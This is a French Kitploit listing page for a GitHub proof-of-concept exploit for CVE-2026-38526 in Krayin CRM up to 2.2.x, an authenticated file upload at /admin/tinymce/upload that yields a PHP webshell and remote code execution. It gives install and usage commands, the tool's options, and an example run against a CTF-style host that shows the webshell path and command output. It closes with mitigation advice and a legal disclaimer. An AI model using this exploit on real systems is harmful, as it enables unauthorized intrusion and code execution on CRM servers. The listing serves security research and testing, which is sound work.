Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-38526 — Python PoC exploiting CVE-2026-38526 in Krayin CRM <= 2.2.x: authenticated PHP webshell upload via /admin/tinymce/upload leading to remote code execution. | Kitploit
Outils/GitHubGitHub/harry178945/cve-2026-38526
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingRed TeamingRemote Access ToolPayload Development
GitHubharry178945/cve-2026-38526

CVE-2026-38526

Python PoC exploiting CVE-2026-38526 in Krayin CRM <= 2.2.x: authenticated PHP webshell upload via /admin/tinymce/upload leading to remote code execution.

1il y a 2 joursPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-38526 — Krayin CRM ≤ 2.2.x Authenticated RCE

⚠️ Avertissement légal : ce code est fourni à des fins éducatives et pour des tests autorisés uniquement (CTF, bug bounty, labo privé). L'auteur n'est pas responsable d'une utilisation illégale.

Description

Krayin CRM (Webkul) ≤ 2.2.x expose l'endpoint /admin/tinymce/upload qui permet à un utilisateur authentifié (même à faible privilège) d'uploader des fichiers sans validation d'extension. Le fichier est ensuite servi depuis le dossier storage/, permettant l'exécution arbitraire de code PHP.

  • Type : Arbitrary File Upload → RCE
  • CVSS : 9.9 (Critique)
  • Authentification requise : Oui (tout compte valide)

Installation

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

Usage

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

Options :

OptionDescription
-t, --targetURL racine de la cible
-u, --userEmail du compte Krayin
-p, --passwordMot de passe
-c, --commandCommande à exécuter (défaut : id)
--login-pathChemin de login (défaut : /admin/login)
--upload-pathChemin d'upload (défaut : /admin/tinymce/upload)
--timeoutTimeout HTTP (défaut : 15)

Exemple

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] Récupération du token CSRF sur http://billing.nexus.htb/admin/login
[*] Envoi du formulaire de login
[+] Authentification réussie
[*] Upload de x8f2k1ab.php via http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell accessible : http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Exécution : id

============================================================
[+] Commande : id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Mitigation

  • Mettre à jour Krayin CRM vers la version corrigée.
  • Restreindre l'extension des fichiers uploadés (whitelist).
  • Interdire l'exécution PHP dans les dossiers storage/ et uploads/.
  • Appliquer le principe du moindre privilège sur les comptes CRM.

Disclaimer

Ce projet est publié à des fins de recherche en sécurité. Toute utilisation contre des systèmes sans autorisation écrite préalable est illégale et strictement interdite.

Télécharger l’outil